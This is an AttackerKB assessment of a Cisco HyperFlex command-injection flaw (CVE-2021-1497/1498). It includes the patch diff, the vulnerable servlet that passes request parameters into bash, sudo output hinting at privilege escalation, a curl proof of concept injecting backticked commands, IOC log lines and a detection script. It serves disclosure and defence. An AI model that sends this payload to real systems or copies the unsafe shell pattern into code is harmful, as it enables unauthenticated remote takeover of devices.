AttackerKB AKB:77557E97-8311-4C07-B6B7-5AE38B6A1069
History: May 05, 2021 - 12:00 a.m.

CVE-2021-1497

Source: attackerkb.com

CVSS2: 10 High
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3: 9.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS: 0.975 High
Percentile: 100.0%

Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. For more information about these vulnerabilities, see the Details section of this advisory.

Recent assessments:

wvu-r7 at May 18, 2021 12:18am UTC reported:

Attacker value is a little lower because I was able to test only the installer.

CVE-2021-1497/CVE-2021-1498

Command injection in the /storfs-asup endpoint’s token and mode parameters.

Patch

--- unpatched/web.xml	2021-05-17 19:06:17.000000000 -0500
+++ patched/web.xml	2021-05-17 19:06:23.000000000 -0500
@@ -69,17 +69,6 @@
 	</servlet-mapping>

 	<servlet>
-		<servlet-name>Springpath Storfs ASUP</servlet-name>
-		<servlet-class>com.storvisor.sysmgmt.service.StorfsAsup</servlet-class>
-		<load-on-startup>1</load-on-startup>
-	</servlet>
-
-	<servlet-mapping>
-		<servlet-name>Springpath Storfs ASUP</servlet-name>
-		<url-pattern>/storfs-asup/*</url-pattern>
-	</servlet-mapping>
-
-	<servlet>
 		<servlet-name>Springpath Upgrade Image Upload Service</servlet-name>
 		<servlet-class>com.storvisor.sysmgmt.service.StorvisorFileUploader</servlet-class>
 	</servlet>
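
Review bot: In the removed <servlet> and <servlet-mapping> entries for "Springpath Storfs ASUP", the fix only unregisters /storfs-asup/* in web.xml; nothing in this diff shows com.storvisor.sysmgmt.service.StorfsAsup itself being deleted or changed. If the class still ships in the webapp, merging or restoring an older web.xml brings the endpoint back with the same behaviour. I would remove the class in the same change, or rework it so request parameters never reach a shell string, and add a deployment check that no mapping for /storfs-asup remains.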

Vulnerability

  protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
    String action = request.getParameter("action");
    if (action == null) {
      String msg = "Action for the servlet need be specified.";
      writeErrorResponse(response, msg);
      return;
    }
    try {
      String token = request.getParameter("token");
      StringBuilder cmd = new StringBuilder();
      cmd.append("exec /bin/storfs-asup ");
      cmd.append(token);
      String mode = request.getParameter("mode");
      cmd.append("  ");
      cmd.append(mode);
      cmd.append("  > /dev/null");
      logger.info("storfs-asup cmd to run : " + cmd);
      ProcessBuilder pb = new ProcessBuilder(new String[] { "/bin/bash", "-c", cmd.toString() });
      logger.info("Starting the storfs-asup now: ");
      long startTime = System.currentTimeMillis();
      Process p = pb.start();
      InputStream errStream = p.getErrorStream();
      String errMsg = FileUtils.readToString(errStream);
      int exitCode = p.waitFor();
      long timeTaken = System.currentTimeMillis() - startTime;
      logger.info("storfs-asup command completed in (" + timeTaken + " ) milliseconds, with exit code (" + exitCode + ") and error message: " + errMsg);
      errStream.close();
      OutputStream outStream = p.getOutputStream();
      outStream.flush();
      outStream.close();
      if (exitCode != 0)
        throw new Exception(errMsg);
    } catch (IOException ex) {
      logger.error("Failed to generate asup: " + ex);
    } catch (Exception ie) {
      logger.error("Failed to run the /bin/storfs-asup command.");
    } finally {
      logger.info("Done executing asup command. ");
    }
  }



tomcat7@HyperFlex-Installer-4:~$ sudo -l
Matching Defaults entries for tomcat7 on HyperFlex-Installer-4:
    !lecture, tty_tickets, !fqdn

User tomcat7 may run the following commands on HyperFlex-Installer-4:
    (ALL) NOPASSWD: /opt/springpath/storfs-support/support.py
    (ALL) NOPASSWD: /opt/springpath/storfs-asup/generate_asup.sh
    (ALL) NOPASSWD: /opt/springpath/storfs-asup/generate_sch.sh
tomcat7@HyperFlex-Installer-4:~$ sudo /opt/springpath/storfs-support/support.py --help
Usage: support.py [options]

Options:
  -h, --help            show this help message and exit
  -t TARGET, --target=TARGET
                        Target directory where the support bundle should go
                        (XXX: This could be a remote host(dir), ex:
                        hostname:/foo). Optional. Default = /tmp
  -i INSTALLDIR, --installdir=INSTALLDIR
                        Install directory for storfs. Optional.
  -k ZKDIR, --zkdir=ZKDIR
                        zookeeper directory for storfs. Optional
  -l LOGDIR, --logdir=LOGDIR
                        log directory for storfs. Optional
  --asupdir=ASUPDIR     asup directory for storfs. Optional
  -c COREDIR, --coredir=COREDIR
                        core directory for storfs. Optional
  -m MANIFESTDIR, --manifestdir=MANIFESTDIR
                        Manifest directory for storfs support. All files with
                        .mfx extension in this directory will be processed.
                        Optional
  --list                List the manifests. Optional
  -f MANIFESTFILES, --manifest-file=MANIFESTFILES
                        Manifest file to use for generating support. Multiple
                        manifest files can be specified. Manifests files are
                        required to have .mfx suffix. Optional (Cannot be with
                        -m option)
  -e TOOLSEXEDIR, --toolsexedir=TOOLSEXEDIR
                        log directory for storfs binary files. Optional
  --hypervdir=HYPERVDIR
                        log directory for hyperv binary files. Optional
  -o TOOLSDIR, --toolsdir=TOOLSDIR
                        Path for storfs tools. Optional
  -r RUNTIMEDIR, --runtimedir=RUNTIMEDIR
                        Path for runtime dir (which contains
                        storfs_running_process.pid files). Optional
  -b BUILDTYPE, --buildtype=BUILDTYPE
                        Build type that was running. Optional. Default = debug
  -a ADDITIONAL_FILES, --additional-files=ADDITIONAL_FILES
                        any additional files/directories (not in manifest)
                        that should be added to the support bundle. Optional.
  --dry-run             Process manifests to make sure that there are no
                        errors
tomcat7@HyperFlex-Installer-4:~$ ls /opt/springpath/storfs-support/*.mfx
/opt/springpath/storfs-support/springpath-basic.mfx                    /opt/springpath/storfs-support/springpath-zookeeper-no-db.mfx
/opt/springpath/storfs-support/springpath.mfx                          /opt/springpath/storfs-support/springpath-logs.mfx
/opt/springpath/storfs-support/springpath-default-os.mfx               /opt/springpath/storfs-support/springpath-extended.mfx
/opt/springpath/storfs-support/springpath-default-asup.mfx             /opt/springpath/storfs-support/deployment.mfx
/opt/springpath/storfs-support/springpath-mgmt.mfx                     /opt/springpath/storfs-support/springpath-witness.mfx
/opt/springpath/storfs-support/springpath-default-asup-cli-esx.mfx     /opt/springpath/storfs-support/springpath-default-asup-hyperv.mfx
/opt/springpath/storfs-support/springpath-zookeeper.mfx                /opt/springpath/storfs-support/springpath-default-asup-esx.mfx
/opt/springpath/storfs-support/springpath-default-event-asup.mfx       /opt/springpath/storfs-support/springpath-perf.mfx
/opt/springpath/storfs-support/springpath-default-asup-cli-hyperv.mfx  /opt/springpath/storfs-support/springpath-exhaustive.mfx
tomcat7@HyperFlex-Installer-4:~$ head /opt/springpath/storfs-support/springpath-basic.mfx
# Springpath manifest file. Contains just basic logs.
# Simplified from springpath-mgmt.mfx
["copy", "TIMEOUT_NONE", "IGNORE_ERROR", "/var/jail/var/log/springpath"]
["copy", "TIMEOUT_NONE", "IGNORE_ERROR", "/etc/iptables_node_cluster.rules"]
["exec", "TIMEOUT_NONE", "IGNORE_ERROR", "iptables --list -n -v"]
["exec", "TIMEOUT_NONE", "IGNORE_ERROR", "bom-check.sh"]
["exec", "TIMEOUT=120", "IGNORE_ERROR", "mstcli cluster diag"]
["exec", "TIMEOUT=45", "IGNORE_ERROR", "mstcli cluster info"]
["exec", "TIMEOUT=45", "IGNORE_ERROR", "mstcli appliance list"]
["exec", "TIMEOUT=45", "IGNORE_ERROR", "mstcli datastore list"]
tomcat7@HyperFlex-Installer-4:~$

PoC

wvu@kharak:~$ curl -v http://192.168.123.133/storfs-asup -d 'action=&token=`id`&mode=`id`'
*   Trying 192.168.123.133...
* TCP_NODELAY set
* Connected to 192.168.123.133 (192.168.123.133) port 80 (#0)
> POST /storfs-asup HTTP/1.1
> Host: 192.168.123.133
> User-Agent: curl/7.64.1
> Accept: */*
> Content-Length: 28
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 28 out of 28 bytes
< HTTP/1.1 200 OK
< Server: nginx/1.8.1
< Date: Tue, 18 May 2021 00:54:26 GMT
< Content-Length: 0
< Connection: keep-alive
< Front-End-Https: on
<
* Connection #0 to host 192.168.123.133 left intact
* Closing connection 0
wvu@kharak:~$

IOCs

==> /var/log/nginx/access.log <==
192.168.123.1 - - [17/May/2021:17:54:26 -0700] "POST /storfs-asup HTTP/1.1" 200 0 "-" "curl/7.64.1"

==> /var/log/springpath/stBootstrapGuiBackend.log <==
2021-05-18-00:54:26.012 [tomcat-http-2] INFO  com.storvisor.sysmgmt.service.StorfsAsup.processRequest():59 - storfs-asup cmd to run : exec /bin/storfs-asup `id`  `id`  > /dev/null
2021-05-18-00:54:26.012 [tomcat-http-2] INFO  com.storvisor.sysmgmt.service.StorfsAsup.processRequest():64 - Starting the storfs-asup now:
2021-05-18-00:54:26.017 [tomcat-http-2] INFO  com.storvisor.sysmgmt.service.StorfsAsup.processRequest():71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory
2021-05-18-00:54:26.020 [tomcat-http-2] ERROR com.storvisor.sysmgmt.service.StorfsAsup.processRequest():89 - Failed to run the /bin/storfs-asup command.
2021-05-18-00:54:26.020 [tomcat-http-2] INFO  com.storvisor.sysmgmt.service.StorfsAsup.processRequest():91 - Done executing asup command.

==> /var/log/tomcat7/catalina.out <==
2021-05-18-00:54:26.012 INFO  com.storvisor.sysmgmt.service.StorfsAsup:59 - storfs-asup cmd to run : exec /bin/storfs-asup `id`  `id`  > /dev/null
2021-05-18-00:54:26.012 INFO  com.storvisor.sysmgmt.service.StorfsAsup:64 - Starting the storfs-asup now:
2021-05-18-00:54:26.017 INFO  com.storvisor.sysmgmt.service.StorfsAsup:71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory
2021-05-18-00:54:26.020 ERROR com.storvisor.sysmgmt.service.StorfsAsup:89 - Failed to run the /bin/storfs-asup command.
2021-05-18-00:54:26.020 INFO  com.storvisor.sysmgmt.service.StorfsAsup:91 - Done executing asup command.

==> /var/log/tomcat7/localhost_access_log.2021-05-17.txt <==
127.0.0.1 - - [17/May/2021:17:54:26 -0700] "POST /storfs-asup HTTP/1.0" 200 -

Assessed Attacker Value: 4
Assessed Attacker Value: 5
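
The IOCs above can be turned into a log check. The following is an added example, not part of the original assessment or of any Cisco tooling: it flags "storfs-asup cmd to run" entries whose arguments contain shell metacharacters, and any access-log request to /storfs-asup. The regexes assume the log formats shown in the IOCs, and the last sample line is constructed.

```python
import re

# Message StorfsAsup.processRequest() logs just before it runs "bash -c".
CMD_RE = re.compile(
    r"^(?P<ts>\S+) .*?storfs-asup cmd to run : "
    r"exec /bin/storfs-asup (?P<args>.*?)  > /dev/null$"
)
# Characters bash acts on when token/mode land unquoted in the command string.
SHELL_META = re.compile(r"[`$;|&<>(){}\\'\"]")
# Combined-format access-log entry for the endpoint (the POST body is not logged).
ACCESS_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[A-Z]+ /storfs-asup[^" ]* HTTP/'
)


def scan(lines):
    """Return (kind, timestamp, detail) tuples for suspicious log lines."""
    findings = []
    for raw in lines:
        line = raw.rstrip("\r\n")
        cmd = CMD_RE.match(line)
        if cmd and SHELL_META.search(cmd.group("args")):
            findings.append(("injection", cmd.group("ts"), cmd.group("args")))
            continue
        hit = ACCESS_RE.match(line)
        if hit:
            findings.append(("endpoint_hit", hit.group("ts"), hit.group("src")))
    return findings


SAMPLE = [
    # From the IOCs above: nginx access log and stBootstrapGuiBackend.log.
    '192.168.123.1 - - [17/May/2021:17:54:26 -0700] "POST /storfs-asup HTTP/1.1" 200 0 "-" "curl/7.64.1"',
    "2021-05-18-00:54:26.012 [tomcat-http-2] INFO  com.storvisor.sysmgmt.service.StorfsAsup.processRequest():59 - storfs-asup cmd to run : exec /bin/storfs-asup `id`  `id`  > /dev/null",
    "2021-05-18-00:54:26.012 [tomcat-http-2] INFO  com.storvisor.sysmgmt.service.StorfsAsup.processRequest():64 - Starting the storfs-asup now: ",
    # Constructed line: token and mode values are assumed benign placeholders.
    "2021-05-18-01:02:03.000 [tomcat-http-3] INFO  com.storvisor.sysmgmt.service.StorfsAsup.processRequest():59 - storfs-asup cmd to run : exec /bin/storfs-asup abc123  full  > /dev/null",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

An endpoint_hit carries no parameters because the access logs do not record the POST body; the injected values only appear in the application log entries. Parameters containing a newline would split across log lines and are not reassembled here.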
